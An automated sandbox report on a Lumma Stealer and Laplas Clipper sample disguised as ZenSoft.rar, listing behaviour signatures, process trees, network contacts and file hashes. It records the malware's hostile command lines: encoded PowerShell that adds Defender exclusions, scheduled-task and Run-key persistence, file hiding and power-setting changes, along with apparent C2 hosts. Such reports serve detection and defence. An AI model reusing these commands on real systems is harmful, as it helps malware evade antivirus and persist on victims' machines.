Malware Analysis Report

2024-10-19 01:12

Sample ID 230729-t8as9afa5z
Target ZenSoft.rar
SHA256 9f706ef0f596b25a281b45ce2e0ebb4fa0fb32b53d3e6e386fc5bdda68f46930
Tags
laplas lumma clipper persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9f706ef0f596b25a281b45ce2e0ebb4fa0fb32b53d3e6e386fc5bdda68f46930

Threat Level: Known bad

The file ZenSoft.rar was found to be: Known bad.

Malicious Activity Summary

laplas lumma clipper persistence spyware stealer

Laplas Clipper

Lumma Stealer

Downloads MZ/PE file

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Enumerates connected drives

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

GoLang User-Agent

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-29 16:43

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-29 16:43

Reported

2023-07-29 16:47

Platform

win7-20230712-en

Max time kernel

122s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

Signatures

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (value omitted) C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Processes

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 140.82.113.3:443 github.com tcp

Files

memory/2596-54-0x00000000778A0000-0x00000000778A2000-memory.dmp

memory/2596-56-0x00000000778A0000-0x00000000778A2000-memory.dmp

memory/2596-59-0x00000000776F0000-0x0000000077899000-memory.dmp

memory/2596-58-0x00000000778A0000-0x00000000778A2000-memory.dmp

memory/2596-60-0x000000013F090000-0x000000014240C000-memory.dmp

memory/2596-64-0x00000000776F0000-0x0000000077899000-memory.dmp

memory/2596-65-0x00000000776F0000-0x0000000077899000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-29 16:43

Reported

2023-07-29 16:47

Platform

win10v2004-20230703-en

Max time kernel

70s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

Signatures

Laplas Clipper

stealer clipper laplas

Lumma Stealer

stealer lumma

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key value queried \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4828 set thread context of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Enumerates physical storage devices

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4828 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4828 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4828 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4828 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3836 wrote to memory of 3024 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe
PID 3836 wrote to memory of 3024 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe
PID 3836 wrote to memory of 1804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe
PID 3836 wrote to memory of 1804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe
PID 3836 wrote to memory of 1804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe
PID 1804 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe C:\Windows\system32\cmd.exe
PID 3504 wrote to memory of 464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 3504 wrote to memory of 464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 3504 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 3504 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 3504 wrote to memory of 3136 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 3504 wrote to memory of 3136 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 3504 wrote to memory of 4656 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 3504 wrote to memory of 4656 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 3504 wrote to memory of 3316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3504 wrote to memory of 3316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3504 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\4.exe
PID 3504 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\4.exe
PID 3504 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\4.exe
PID 2852 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 904 wrote to memory of 4132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 904 wrote to memory of 4132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 904 wrote to memory of 4132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 3024 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
PID 3024 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAANQA=

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAyADUA

C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe

"C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe"

C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe

"C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p151971033210090161381766327410 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "4.exe"

C:\Users\Admin\AppData\Local\Temp\main\4.exe

"4.exe"

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C powershell -EncodedCommand "PAAjAGkARQBvAGUAMQAyADEAdABkAEMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBwAEcASgBBAGIAUgBBADEAdABUACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEQAQwBMAGIAWQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBlAGkARABpAGkAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAGkARQBvAGUAMQAyADEAdABkAEMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBwAEcASgBBAGIAUgBBADEAdABUACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEQAQwBMAGIAWQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBlAGkARABpAGkAIwA+AA=="

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7205" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 owen-wilson-wow-api.onrender.com udp
US 216.24.57.3:443 owen-wilson-wow-api.onrender.com tcp
US 8.8.8.8:53 3.57.24.216.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 update-vinc.in.net udp
NL 194.87.31.176:443 update-vinc.in.net tcp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 176.31.87.194.in-addr.arpa udp
US 8.8.8.8:53 gstatic-node.io udp
US 188.114.96.0:80 gstatic-node.io tcp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
N/A 194.50.153.183:80 194.50.153.183 tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 8.8.8.8:53 183.153.50.194.in-addr.arpa udp
US 188.114.96.0:80 gstatic-node.io tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
US 140.82.113.3:443 github.com tcp
US 140.82.113.3:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 3.113.82.140.in-addr.arpa udp
NL 185.209.161.189:80 185.209.161.189 tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 189.161.209.185.in-addr.arpa udp
NL 2.22.54.122:443 www.bing.com tcp
NL 2.22.54.122:443 www.bing.com tcp
US 8.8.8.8:53 122.54.22.2.in-addr.arpa udp
US 8.8.8.8:53 66.112.168.52.in-addr.arpa udp

Files

memory/4828-134-0x00007FFE602B0000-0x00007FFE602B2000-memory.dmp

memory/4828-135-0x00007FF6AAEB0000-0x00007FF6AE22C000-memory.dmp

memory/2300-139-0x000001C1EA210000-0x000001C1EA232000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ilcnrcqt.0wj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2300-149-0x00007FFE40A60000-0x00007FFE41521000-memory.dmp

memory/2300-150-0x000001C1E9950000-0x000001C1E9960000-memory.dmp

memory/2300-151-0x000001C1E9950000-0x000001C1E9960000-memory.dmp

memory/2300-152-0x000001C1E9950000-0x000001C1E9960000-memory.dmp

memory/2300-155-0x00007FFE40A60000-0x00007FFE41521000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/4616-166-0x00007FFE40A60000-0x00007FFE41521000-memory.dmp

memory/4616-167-0x0000017B0D100000-0x0000017B0D110000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1bad2704664b4c1a190586ec492be65f
SHA1 1c98e6645c66774152c184d23f7a3178ce522e7b
SHA256 5950586396814b38bfdbb86757839fc8c7ce3eb73577775473c29ce6be81fe3e
SHA512 668553c12f1e5560baba826d5c8b139d7c7e323b6aa4e3723aaca479850f898c147d63cb77d305d715044db1e75cf501d6502ca214c7ed05ded424b230893bb0

memory/4616-168-0x0000017B0D100000-0x0000017B0D110000-memory.dmp

memory/4616-170-0x0000017B0D100000-0x0000017B0D110000-memory.dmp

memory/4616-171-0x00007FFE40A60000-0x00007FFE41521000-memory.dmp

memory/4616-172-0x0000017B0D100000-0x0000017B0D110000-memory.dmp

memory/4616-173-0x0000017B0D100000-0x0000017B0D110000-memory.dmp

memory/4616-175-0x00007FFE40A60000-0x00007FFE41521000-memory.dmp

memory/3836-176-0x0000000000400000-0x0000000000464000-memory.dmp

memory/3836-178-0x0000000000400000-0x0000000000464000-memory.dmp

memory/3064-179-0x00007FFE40A60000-0x00007FFE41521000-memory.dmp

memory/3064-180-0x000001CA62880000-0x000001CA62890000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fc28168b916bf9744961653d503e1164
SHA1 71deadab13b81a414582f931e9af010152463644
SHA256 a2a78e9fb30fe365d454ca6bbbf950355049c978262fdf0e80cd683622cf00e9
SHA512 08d828e18ccb2892f12dcbbaf5a5ffcafb4e2e768536fc46b3d2fce788c52b2f61058e1ef0a47e648e2308f4f1aeb8799bef9472726d2800fa9b775f401e08c9

memory/3064-191-0x00007FFE40A60000-0x00007FFE41521000-memory.dmp

memory/3064-192-0x000001CA62880000-0x000001CA62890000-memory.dmp

memory/3064-193-0x000001CA62880000-0x000001CA62890000-memory.dmp

